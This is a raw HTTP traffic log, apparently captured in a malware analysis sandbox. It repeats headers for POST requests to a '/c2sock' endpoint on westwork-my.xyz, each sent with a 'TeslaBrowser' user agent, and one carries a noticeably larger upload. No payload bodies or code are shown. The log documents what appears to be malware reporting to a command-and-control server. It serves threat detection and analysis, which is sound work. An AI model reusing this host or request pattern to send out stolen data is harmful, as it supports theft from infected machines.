Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=vhqbjhj2c2cpk5v2l7336veu7f; expires=Fri, 17 Nov 2023 16:21:06 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d26mw%2BIV5ZNG9yUJB05KlkPnrJqYNPJTv5OBeJJ9KOWhS26%2FB7nWaZ0C4qqgW68GeUPoYSx%2Bbf8%2BJf3%2B6TjC7McZCIdciP8To1D3D9Dvci3AD5w2Rvnkwxk%2FGnbzVRniCp0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa16f7c7f19fc-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=thamit6d0jgi8ecii9a0ntjnkf; expires=Fri, 17 Nov 2023 16:21:07 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PkQg6UQJj9Sn1N9jWZiiEhMfYJskOfibdD2e3D0iKSRC9Q%2FgA26i4oC07U3tIzfr5NHkhpVWkqLXg8HK%2BzfFa5kD9BPiaoLzg7n%2BZO2EghTkc5TKgIZsKllOHXvaa%2BELfEw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1746f6017c3-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=068h54kn09uojglms726l8lotk; expires=Fri, 17 Nov 2023 16:21:08 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ui6%2FC%2BrdLq8WDqRvsvwWuBluP6u59XxjMtwtzcdLWaVNZktjip82ZjLBmU0EztVLDc2KF65C7v%2B0ZHXvmhFCuOU0%2BRUQgS3euspnKGq9jubih2RqCR3LjYU7j0YzYsfhKq0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa179281c17be-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=eip3gmnq0pgm9s7thgjar2jacd; expires=Fri, 17 Nov 2023 16:21:09 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O6ryfRj2%2Fq0PFaiunxMAjsCiX0XnbGTQo3EKAn4YrulXpFy0ONWqD6iQxGIB8EiNp35MxTYt%2FAO6Ua8ODPnCmu4nicyR23ly3My2gs0MMrNA6me9sBdn7caV7%2BADh0tjmuc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa17f3c9c837e-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=tdgm3j2on5kpmf4phgef4s0esa; expires=Fri, 17 Nov 2023 16:21:09 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OzQpBQr9EyAWDvzMGbBHvEv4tSpDgpfKz9Jyj%2FSKqB4erVGDcqHS2XacbfmQ0XhmzyiqWumsTrlnAMIS1NA62nfegylNmy4wkQTLlO9M7siCDzjmLvrdYeOuYReQ7nMWqzQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1835df4831c-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=6clbqal8m5ua4pk62sn37a2da2; expires=Fri, 17 Nov 2023 16:21:10 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nBtHnYWKGwpRazRhigKPPupf%2BCP%2BXPdv54qETBsy3E2fS7CDlAo69NF2Dl9WP0RzfyyRbaTBfcFA3LLuPrs2Zf%2FY4Ah3JBo06%2FCevzQlcq%2B26XbDfFCJMz6fk6vZTjes7DY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1863aa71a02-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=3atluvvefcq4qfnb44thbgbiqb; expires=Fri, 17 Nov 2023 16:21:11 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MSwwFtScPWYutgHFAtaoU%2B7j9wqbBW0psl%2BCHkDZzrO74HPLwgJpvTkG9teLhVkOi80b%2Bvcwwzt4U1RHM43iDgYTAPWsT44he5M9%2FxFRA%2FLV04Tug0pgr%2F9DwJK5P8NRxyE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa18b5b538d28-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=hjilmh1lq5ul1214r1e1aoo445; expires=Fri, 17 Nov 2023 16:21:11 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5xcExYJ2pgaYRO8F0mWIqArHZWCTh%2Bv564gFf2jkYmOe3svR3OyHOBkc8zQhEXpvcpVXbJI4P%2FdDZx4g0WWZECw81SMLsSHnexn5wcN47Gp%2FamhD81qOLgOxoS9pTfAJn2E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa19029e819de-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=ehrs2nhpsqc2cug40c6jnl43jv; expires=Fri, 17 Nov 2023 16:21:12 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5QPxqPUbl7Jq7a8zbwMLl%2F7SOcJoFgm3US1V%2FFLZuv8NyP28fr8ilsOOsw%2FFuq5jYEr%2BujweqRVvFyGMeL0TRz4ESO66bWzU4lyxFW4frHrn3%2FOOCxf%2B%2BeChlUgdiTyIrw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa195182b8344-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=o702m12nh3b10adipdrnl3vdtm; expires=Fri, 17 Nov 2023 16:21:13 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pnC7u7daVth6pbPWyUri7nV%2FiG%2F06wvZ%2FyOlx86H8rtIn3uPVpbQCYBkeJtz5gthgJ%2BRajvxZUxztSG35vpQlsRL3w6Qw9%2BVpVO8PvS%2BXWR5nbU5%2BZZSioxFICdSYNrEuRA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa19a28a38d25-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=57rrdp9rit4p18nusj0p2e6cb8; expires=Fri, 17 Nov 2023 16:21:13 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fgUDNKH11%2Fb3lE80qblETtZey%2BP5ZtZi%2FRPhBgvU7ATFRYLb9jRu4WKLeS8D3kQfh9QORmBzXtbq40UE%2Bx094RwoLlyIfL9dYhODrGkThpa1E4xOeZLt7%2BiSVE6AqT0iIic%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa19d5fa919fa-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=9o07k0rbih4pt4lfta641p4la8; expires=Fri, 17 Nov 2023 16:21:14 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6B65%2BS1jsL0n0J4XxQv16pSQzbJxGyShMU9cPo%2FZ6Pmyps6%2Fs%2BbJv2vdbF5WSNccvvfl57ml0BHKTri%2BVk4P8ypXnXCEkKgbjw%2BJiyui5JaALqg4dku6yOMEvK9APxhNHw8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1a17c8c835a-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=0928l4di01hq1isaf4rm3dvfs2; expires=Fri, 17 Nov 2023 16:21:15 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UghuRD2obvjLs%2F61oAQyOVW%2FgyMg85N53ZHX%2BILjcyYFBk2NsPQ1MBDPMJ8oxRLOGzuGW2dRtZ0ix2viGOTZZ0%2Fab2MB0KbikE2bNcZf7fOd2JGYXhyPRo5jUnsq6ZEZea4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1a66bf419dd-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=bs0m7l9oplk1nk7taptnj3bble; expires=Fri, 17 Nov 2023 16:21:16 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mWpjKKqqXkI07%2Fmo6PrZdtUzQs8gU7LxqP1GCnp6vTV5ywvXFzmbpodGif1U0ITgYT5j%2BiHCl%2FyDAigw9AlGbC23Dmw22pzyCla3gNo2BLuaK4066iieaCAHatp%2B4%2BjF8eg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1ab7acf1a2b-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=uv1j2eiai2kmnguuuien1065gt; expires=Fri, 17 Nov 2023 16:21:16 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z2St38Mz2xMelCnpKQl8aQN2AHG6goMrWndaAylqFUnOpp4tGuaEqDTsPclXBNlWqlj%2B4Ba08uNMecAohJOkNt2SLGEL61mUT9p3OpwUZvNa7RyxHKEuB8ngMJxlwFHM3C4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1afde12833a-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=6n54v17p83ciml0eudgitis6m5; expires=Fri, 17 Nov 2023 16:21:17 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UEm6svAiajU%2B4wAEdmz%2B4jk9Yyed%2F79oFVkalKD7ETgyANxm7wcKGKFRVoDwOUq8r5Xvc5CnoUlNroyW3jR8sezoPAKa8vJc6xmMrX4dZIfBFCRjfudLSYiSrz1uVaBXyZ0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1b2b8b28d01-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 23064
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=cdsumjbkggb6coig4t68ob1fjg; expires=Fri, 17 Nov 2023 16:21:17 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xnvrzDwb%2FCBftL9xSZtVjDf%2BPDoQ2uA7JrOzYxwpb8QmfHBPj3yWbGqjIBgACqiM6lI5T2WVxOO%2BvO1d7ADULESiOq%2Fnqb%2FU8iUV2n8zR37gu88o77dGNdCPmj%2BRH6sY%2Bjc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1b7af4f833b-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=bd74v5emimji00km6ig1ejdhv8; expires=Fri, 17 Nov 2023 16:21:19 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dTM6PK6950ik1N%2BD%2BTe5DrAsjV8wvJ%2BjLyy%2B%2BW1fOYjXLfOcSRM4fLkJV7Ru0T77KgETUL6SburhDrhJc4DoIJjRtjcsHAdk0hnzYvYgEuDlxTBDylBhtrXwcNxe0YCagcc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1bd8abc0aae-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=svn3tmn27t6nuid9op9aqvr9th; expires=Fri, 17 Nov 2023 16:21:20 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ra4PCpypEpavnV74M0EkBRl%2Fbw2avpVVGGBtsjRmk5h0CA46KTPg8XfeYhmu5fJAX%2BSD5waA2p4a5PFtkFitS1iEn8eoe0kwloe7FsnTNdp3pP3mNGbS9W%2BWRwFpwutvoz8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1c41d4419cd-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=s7c595bmcjoi4rpv688kqn5no2; expires=Fri, 17 Nov 2023 16:21:20 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kxnbUIpa23ipUPn40NRfVhNuS7naNrrVhMiWrAkCdSraGqVwTq2Swo9PGnb8jaDRob9I6erNI2v51g8S3dloDLWvlPXmuGymvDsEx74q8bRXQrSiN8LDhqmIlGzW9lNeuis%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1caa8b48328-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=mgkl414dcrvjk4h9huhtg5g9v9; expires=Fri, 17 Nov 2023 16:21:21 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mPPEyl5bsH45xaQRZZRmRNjLegaWgYBiFb9Zwsv5wdXflaZDH%2FdBZHqIMtKg8k3dOaXqtXoFlQYyEWtX0C4LynSqCUHoS5EsT3QyBCyw8bZDJLh482jyjfiCnpBSGlSwTyk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1cf3bfd19ca-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=64m46ab3p55jqd9aaahclgprif; expires=Fri, 17 Nov 2023 16:21:22 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fh2jyPGiIm1wOUJVyuw3lcM10VcLZ8Ez3KZskYZCPSJIwrdnA6N84bIHSk65fqKNmR7XfTFDmonbE%2FU%2FlPzWXz9Jeyxucm5%2BVeBIsRbvi%2BeEk4e5C7lNNrqUHX6SRS2wVUA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1d509088d19-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=p038ak5aj7d2kji4gvgop6hib3; expires=Fri, 17 Nov 2023 16:21:23 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
